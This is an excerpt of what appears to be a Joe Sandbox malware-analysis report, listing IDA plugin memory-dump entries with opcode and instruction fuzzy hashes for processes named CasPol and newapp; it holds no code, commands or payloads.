                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c0dae4bb91c53765ff57c103faf0e1da32b65e6e0061601d099b68c5f3fbb7f9
                                                                • Instruction ID: 74488bab41c7309cb46e41dc98cc5b770e85cd6f07feece9af1cba91a3f12d0e
                                                                • Opcode Fuzzy Hash: c0dae4bb91c53765ff57c103faf0e1da32b65e6e0061601d099b68c5f3fbb7f9
                                                                • Instruction Fuzzy Hash: F82169B0B045404BEF2A8615968835E7B46AFC324CF28D19FC09D8E656F777C847C362
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 42582624fbbdc2566cf022d3a0147b41eaf2e6c62ebde7c21d06518666193a55
                                                                • Instruction ID: a189cd6c77699efd95e21d15dd5012b8a051ed3d099067e713abc3c5a5c16931
                                                                • Opcode Fuzzy Hash: 42582624fbbdc2566cf022d3a0147b41eaf2e6c62ebde7c21d06518666193a55
                                                                • Instruction Fuzzy Hash: 17114635B001289BCF18A7B894186EE76E6EFC8355B014579DA06E7784DF389C168BD1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7460764cfd772f0833da54e8f01d62545df72512cd2a0b2afda5789db4629b21
                                                                • Instruction ID: fe5f6d41d41c2cc4cc391edc9b90b84f20ea0d36effd20f3d6a534712d544727
                                                                • Opcode Fuzzy Hash: 7460764cfd772f0833da54e8f01d62545df72512cd2a0b2afda5789db4629b21
                                                                • Instruction Fuzzy Hash: 4F115E34F001159F8B84FBBDD4449DEB7F2EB8C610741846AD50AE7744EB34AD16CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fc43dd60296b978506772720e34055dbb687b9de66c3bc572a0ac4f8fac9953a
                                                                • Instruction ID: be6dc04fc746dda815e34ed647d2d3ef99d79d5e1057c38a447fb1d2e299ccba
                                                                • Opcode Fuzzy Hash: fc43dd60296b978506772720e34055dbb687b9de66c3bc572a0ac4f8fac9953a
                                                                • Instruction Fuzzy Hash: 4A115E74F001198F8B84EBBCD4449AEB7F2FF8C610781846AD509E7344EB349D168BA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0d9ac3341dd330d2fe72f62ad7d6e394fd413304aeed0c87dad4a19ff82a2d47
                                                                • Instruction ID: 65549f13e90d4aae8f9e0ceff8858dd1cd0d4dd5a70ecf7a07966ee94845352a
                                                                • Opcode Fuzzy Hash: 0d9ac3341dd330d2fe72f62ad7d6e394fd413304aeed0c87dad4a19ff82a2d47
                                                                • Instruction Fuzzy Hash: D11104B2F043048FDB18DFB994542AEBAE3BBCA210F14987FD50ADB381EA3588058351
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d26a3c4f9002d3380181ff6cdc0e5fbd1e26f3c6f3f32df8d4d9534425442fa1
                                                                • Instruction ID: 5787256e4120db8931f33ac8b9bd6658b53141e642fbff78fc9c95ae38d9cf07
                                                                • Opcode Fuzzy Hash: d26a3c4f9002d3380181ff6cdc0e5fbd1e26f3c6f3f32df8d4d9534425442fa1
                                                                • Instruction Fuzzy Hash: 0601D376A0011C9B9F18DF99D8448DEBBB6FF88310F10812AE909AB214D7359A19DB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 72cba95435e9f49c5a64f2b5b38cb973cdc8fcefb528eb7bff94d76f00bb4a22
                                                                • Instruction ID: 77b11902c2faadffb83939faef9b3df9d2bfce444aa3ac4817c6ba25b9988fa8
                                                                • Opcode Fuzzy Hash: 72cba95435e9f49c5a64f2b5b38cb973cdc8fcefb528eb7bff94d76f00bb4a22
                                                                • Instruction Fuzzy Hash: CFF03071F001289FCB44EBB9A4086DFBAF9EF88661B114576D50AE7340FE349E1287E5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1918da5e8cef30bafee4a26891f81a167ef2634edcb3ed8b80d8dc14bb7e8d6d
                                                                • Instruction ID: 05e050937992c58f1c2886f68e165760fded8daab0bb82daa48b8b2744ede8de
                                                                • Opcode Fuzzy Hash: 1918da5e8cef30bafee4a26891f81a167ef2634edcb3ed8b80d8dc14bb7e8d6d
                                                                • Instruction Fuzzy Hash: A8E0ED35B001249B8F54FBBDD4588DCB3E2EB8811470184A6D606E7754EE349C16C771
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9e5b0473d0b0efba3fe83a56254000cfd734ee386bb30d30a96b1e568e53cae7
                                                                • Instruction ID: ff72d9b8756fb53a5202b757ae276e12c5ef5bc63d6f7c5f9404d7ad8111f557
                                                                • Opcode Fuzzy Hash: 9e5b0473d0b0efba3fe83a56254000cfd734ee386bb30d30a96b1e568e53cae7
                                                                • Instruction Fuzzy Hash: 66E0ED75B001298B8F48FBB8D4584DCB3E2FF88114B4180A6D606E7754EE34DC168B71
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: acf8a37a43f86dca90afe16cb134910bb872af2641fb8d9ecade70d73f5cb376
                                                                • Instruction ID: 6d8d3be999bee8df6e0c5c5f1900aacfd55b193b72522a9d8e9d6a76b43cee84
                                                                • Opcode Fuzzy Hash: acf8a37a43f86dca90afe16cb134910bb872af2641fb8d9ecade70d73f5cb376
                                                                • Instruction Fuzzy Hash: 3FE0E575B001288B8F44FBBDD8488DDB3E2FB88214B4240A6D60AE7754EE24DC128B71
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c2e48649e3214e01cb6ec574464b8696bc9459417742f1ad884a4cacb2fe32a6
                                                                • Instruction ID: 6ca8426f5501d93dff4e12fcb4bfd3a17fb1c12cd8f1d3f06d5d5b889252f850
                                                                • Opcode Fuzzy Hash: c2e48649e3214e01cb6ec574464b8696bc9459417742f1ad884a4cacb2fe32a6
                                                                • Instruction Fuzzy Hash:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.782132101.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5e90000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: D!%l
                                                                • API String ID: 0-2689253685
                                                                • Opcode ID: fef1f5028d4e28edb0a4352dc23449c7faa994bc1d34ba998963ddf13fad7bef
                                                                • Instruction ID: 1b6643117ab61fdef4de5a8f719f76579497594207f3d3c67c0cca484bca89fc
                                                                • Opcode Fuzzy Hash: fef1f5028d4e28edb0a4352dc23449c7faa994bc1d34ba998963ddf13fad7bef
                                                                • Instruction Fuzzy Hash: 5213F970D106198ECB24EF68C884AEDF7B1FF99300F15D69AD549AB251EB30AAC5CF41
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.767254347.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_23f0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: D0)l
                                                                • API String ID: 0-287000446
                                                                • Opcode ID: 3593761b648d36c47c83428ca0ace1591927e4a569080398b9174329df63ff65
                                                                • Instruction ID: 425c7a46f9c9715d648184668b604ade5e58019ab49488b0042e66655a15e1a2
                                                                • Opcode Fuzzy Hash: 3593761b648d36c47c83428ca0ace1591927e4a569080398b9174329df63ff65
                                                                • Instruction Fuzzy Hash: AC91D534B043188BCB489F75A86577E7AABBFC9204B06C86AE516D7394CF39C801CB95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d3b29174b5ee6db67d8a4fac4dc08afaef5de1c1081a32e568019a87c755a9fc
                                                                • Instruction ID: f56d5aa6d085f335d1d0be21ecdedafdbd4c9e0cc69c0166303ef99f1df570f3
                                                                • Opcode Fuzzy Hash: d3b29174b5ee6db67d8a4fac4dc08afaef5de1c1081a32e568019a87c755a9fc
                                                                • Instruction Fuzzy Hash: 69627E34A402148FDB15EB74D8987ADBBB3EF88314F1584AAE50ADB345DF389D828F51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 876aa0e683004fb3a9300fd8a8005d7bd3f1fccebe768dd9aa0117746ccd47bf
                                                                • Instruction ID: 9dc66f8b5433786834dbcbe567783ecbde9ccb34a62b19f4b51c3f8671fd0d28
                                                                • Opcode Fuzzy Hash: 876aa0e683004fb3a9300fd8a8005d7bd3f1fccebe768dd9aa0117746ccd47bf
                                                                • Instruction Fuzzy Hash: 05627034A402148FDB15EB74D898BADBBB3EF88314F1584AAD50ADB345DF389D828F51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bdd20de38de0a6a503fffa862d8187d9474c99113dcbadd4bacb23fd272c3a45
                                                                • Instruction ID: f490f1d7a4515ec00701d0e224516073483957b5a4e6332e8472b969c7cd9764
                                                                • Opcode Fuzzy Hash: bdd20de38de0a6a503fffa862d8187d9474c99113dcbadd4bacb23fd272c3a45
                                                                • Instruction Fuzzy Hash: E9420A70A002188FDB68DB78C854B9EB7F2EF88214F1185AAD50AEB751EB349D45CF51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.781525373.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_5df0000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cc361216c9ef75b5f0a22c39285896b361ee0dda8be6ff1a9f163735d1176258
                                                                • Instruction ID: 5bf50ac4b2a783d9930597b3dec5ce21e20c713112a682eaeccfc55173f35e9f
                                                                • Opcode Fuzzy Hash: cc361216c9ef75b5f0a22c39285896b361ee0dda8be6ff1a9f163735d1176258
                                                                • Instruction Fuzzy Hash: 6B020A30A002288FDB58EBB8D854BADB7F2BF88208F1184AAD50ADB755DF349D45CF51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_1130000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: P
                                                                • API String ID: 0-3110715001
                                                                • Opcode ID: 21a06c3f9e5fc8608cd6926f6845a86b093a35aac77d625d8eb4c57b5d90b7ec
                                                                • Instruction ID: c2ccf2ab748df2b99d4a341c43e0b414cd38015bba306dbffbcb9d6d4da22d87
                                                                • Opcode Fuzzy Hash: 21a06c3f9e5fc8608cd6926f6845a86b093a35aac77d625d8eb4c57b5d90b7ec
                                                                • Instruction Fuzzy Hash: B132B5316002149FD709EF78D854A6D7BB2FF89304F1685AAE5059B3A6CF34EC46CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_1130000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $,)l
                                                                • API String ID: 0-1057090153
                                                                • Opcode ID: 1ff7d1262ec571d9a912a578282f93601b05dde35f6c6b427dea801d2563ebca
                                                                • Instruction ID: 1e28f7ac48a4e9113d26edb45a2c0e2660ffd154afb6feb23d906d2955022c3a
                                                                • Opcode Fuzzy Hash: 1ff7d1262ec571d9a912a578282f93601b05dde35f6c6b427dea801d2563ebca
                                                                • Instruction Fuzzy Hash: 6A317274A0528CAFDB09EF79D85074A7FB2EBC9204F15C4BBC804A7269DF351906DB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_1130000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: P
                                                                • API String ID: 0-3110715001
                                                                • Opcode ID: 80991de61eccbd51a375a850e09a57d4b078fe9d7a97fa649c1ecaf387f35886
                                                                • Instruction ID: bbe352d4c9d531a785481a17ca4f76b5e4e6e6b156d82b7fba18d7f36bb9c865
                                                                • Opcode Fuzzy Hash: 80991de61eccbd51a375a850e09a57d4b078fe9d7a97fa649c1ecaf387f35886
                                                                • Instruction Fuzzy Hash: F6419530B102149FDB18DB64C4507AEB7F2FF88708F14866DE406AB395DB71AC46CB81
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_1130000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $,)l
                                                                • API String ID: 0-1057090153
                                                                • Opcode ID: 1b56f55a19bc6db27502e4064babc946cde8b4e6dcb2ba0767afdac7eeabd733
                                                                • Instruction ID: 8524371d64ca4601363e70ebfb856ae086c45552362a557d5264ca78bc464c1c
                                                                • Opcode Fuzzy Hash: 1b56f55a19bc6db27502e4064babc946cde8b4e6dcb2ba0767afdac7eeabd733
                                                                • Instruction Fuzzy Hash: E8212374A0564CAFDB09EF6AD84474ABBB3EBCC204F10C47A8904A7369DF356907DB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_1130000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cc3d8c42cf5fe55ac51b6c2f5956f6561689d1c2c940ce2ac039a1f60a86fb07
                                                                • Instruction ID: 0d7dac43d2a78aa56e2790f60cf475b99f351b88632d147f74f5cd6a3a318fab
                                                                • Opcode Fuzzy Hash: cc3d8c42cf5fe55ac51b6c2f5956f6561689d1c2c940ce2ac039a1f60a86fb07
                                                                • Instruction Fuzzy Hash: D6417374B10218AFCB19EB74D898BAE77F2EF8D704B108559E505A7364DF309846DB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_1130000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 033102e7e5517594708e0ede99e825220808b1a03158e1a87fb57c6eefb231fc
                                                                • Instruction ID: 66c511d9339992f07436a1e648a09fc3e8689e207094b63d9572e29fb5f8afe0
                                                                • Opcode Fuzzy Hash: 033102e7e5517594708e0ede99e825220808b1a03158e1a87fb57c6eefb231fc
                                                                • Instruction Fuzzy Hash: 2131E734A082589FCB15EB78D8659AF7FB1EF89204F1180BED545DB3A6CB344D06CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_1130000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8b14730c5516d9b318bd752c9b8a5c9686b583e1c7886f9cc2e96e57f80de77b
                                                                • Instruction ID: c76aa64a30cfa7a4a97939ae9cbc6d059ce5fa1e991e108a1206dda4a665efc5
                                                                • Opcode Fuzzy Hash: 8b14730c5516d9b318bd752c9b8a5c9686b583e1c7886f9cc2e96e57f80de77b
                                                                • Instruction Fuzzy Hash: F52135307082549FDB1A9F799810B5A7BE4EFC6218B1485ABE458CB79ACF30DC46C751
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_1130000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d8df469bd74ad5882ebf924188361b29d5906f7f0b942288989a4e3d2dfb2143
                                                                • Instruction ID: ce27b73220211a383f27d95278a9901623305536381de4a222eda190c47e7599
                                                                • Opcode Fuzzy Hash: d8df469bd74ad5882ebf924188361b29d5906f7f0b942288989a4e3d2dfb2143
                                                                • Instruction Fuzzy Hash: 652198717105508FCB09EB38C4A4A6D37E2AFC961932600A8E50ACF7B6CF26DC46CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_1130000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: eeea2dc5ed76a5e40460094cb1794809de7a882b01130980be194dbf4217f058
                                                                • Instruction ID: a54fdd815d7b56466450079cfddc971ee0f2c079b460bb2714960094bbbf4066
                                                                • Opcode Fuzzy Hash: eeea2dc5ed76a5e40460094cb1794809de7a882b01130980be194dbf4217f058
                                                                • Instruction Fuzzy Hash: C4119574E01209DFDB18DB64E558BAD7BF2AF8D205B108459E516E7364DF309805DB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_1130000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 908fc902df565aebdef21adb8a9f5d5b036f415f7aef2730b99663c2f9145836
                                                                • Instruction ID: 25341c18818b753c9820afe66ff58a992342c8cd4a7b6f3adc77ed2df4e6da71
                                                                • Opcode Fuzzy Hash: 908fc902df565aebdef21adb8a9f5d5b036f415f7aef2730b99663c2f9145836
                                                                • Instruction Fuzzy Hash: AE01AD72900209DFCB58EFB8E859A6E7BB1FB48311B10856BE416D32A0DB30D802DF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.396929729.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_1130000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 940dfa85df32ffe90b9766770e3f7e4ba06d660715a23c66ae52515c010fdc0c
                                                                • Instruction ID: ad3f0babb14155fcb822d23736cbbd464b0189b14cd29700c073f0a34b6e5971
                                                                • Opcode Fuzzy Hash: 940dfa85df32ffe90b9766770e3f7e4ba06d660715a23c66ae52515c010fdc0c
                                                                • Instruction Fuzzy Hash: 55018C75A00218DFCB48EFB8E84896E7BB5FB48311B11856BE41AD32A0DB30D902DF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_c00000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: P
                                                                • API String ID: 0-3110715001
                                                                • Opcode ID: daea71f066353fdf6e3f077494f7f1dfff9d046ea8d280eea365b05d104c2740
                                                                • Instruction ID: f68c4cc63705ccaa6bd65b0262f40380845ebabb62ff9fb1cce63092e585f395
                                                                • Opcode Fuzzy Hash: daea71f066353fdf6e3f077494f7f1dfff9d046ea8d280eea365b05d104c2740
                                                                • Instruction Fuzzy Hash: 2C32A2317002158FDB14EBB4D854BADBBB2BF88314F16C5A9D5169B3A2CB34EC46CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_c00000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $,)l
                                                                • API String ID: 0-1057090153
                                                                • Opcode ID: e0616d8788964dd0386e10962b8cc42d8d922f3fecc7aac820ed962eb13fc3a7
                                                                • Instruction ID: ec1cdaf00c2aa160a165d28e35549655dd57992bdf5e21de3736a7549aeb9c87
                                                                • Opcode Fuzzy Hash: e0616d8788964dd0386e10962b8cc42d8d922f3fecc7aac820ed962eb13fc3a7
                                                                • Instruction Fuzzy Hash: C73175B4A04688AFE709EFB5DC407497BB3ABCD204F15C5ABC4449736ADB381907CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_c00000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: P
                                                                • API String ID: 0-3110715001
                                                                • Opcode ID: 9b1f7af88206acfd80d99bab14792d2468e0d895aca7602419b667fca0104b77
                                                                • Instruction ID: 4b7408720de36d475abd234e03938ad7dea547c05fbdc2c6fb895a247319a441
                                                                • Opcode Fuzzy Hash: 9b1f7af88206acfd80d99bab14792d2468e0d895aca7602419b667fca0104b77
                                                                • Instruction Fuzzy Hash: 8E41B531B102189FDB14DB64C451BAEB7B2FF88308F25C66DE416AB391DB71AC46CB80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_c00000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $,)l
                                                                • API String ID: 0-1057090153
                                                                • Opcode ID: e7b1a8de21c432d3616491ad3e6deca274ad4035a5a907577280be8f0ac23dfa
                                                                • Instruction ID: 2bf1ae86a502913d2acb58d1b5dda773364ce110c350e010848c612eca150f56
                                                                • Opcode Fuzzy Hash: e7b1a8de21c432d3616491ad3e6deca274ad4035a5a907577280be8f0ac23dfa
                                                                • Instruction Fuzzy Hash: 06212E74A0464CABE709EFBAD940749BBB3ABCC204F11C66AD90897369DB385907CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_c00000_newapp.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e38d768b7810e694396f29588fba295722521ec8f3cedce23038fd5b3247aaa7
                                                                • Instruction ID: 1ef7b71d21bc394f7ec0a26c1c6ba0a57c9ad60bd3e158b3aa629e1b577dac51
                                                                • Opcode Fuzzy Hash: e38d768b7810e694396f29588fba295722521ec8f3cedce23038fd5b3247aaa7
                                                                • Instruction Fuzzy Hash: D8416235B10215AFDB05EB70D898BAE77B2BF8D704F218519E506E73A1DF34A846CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.408416761.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
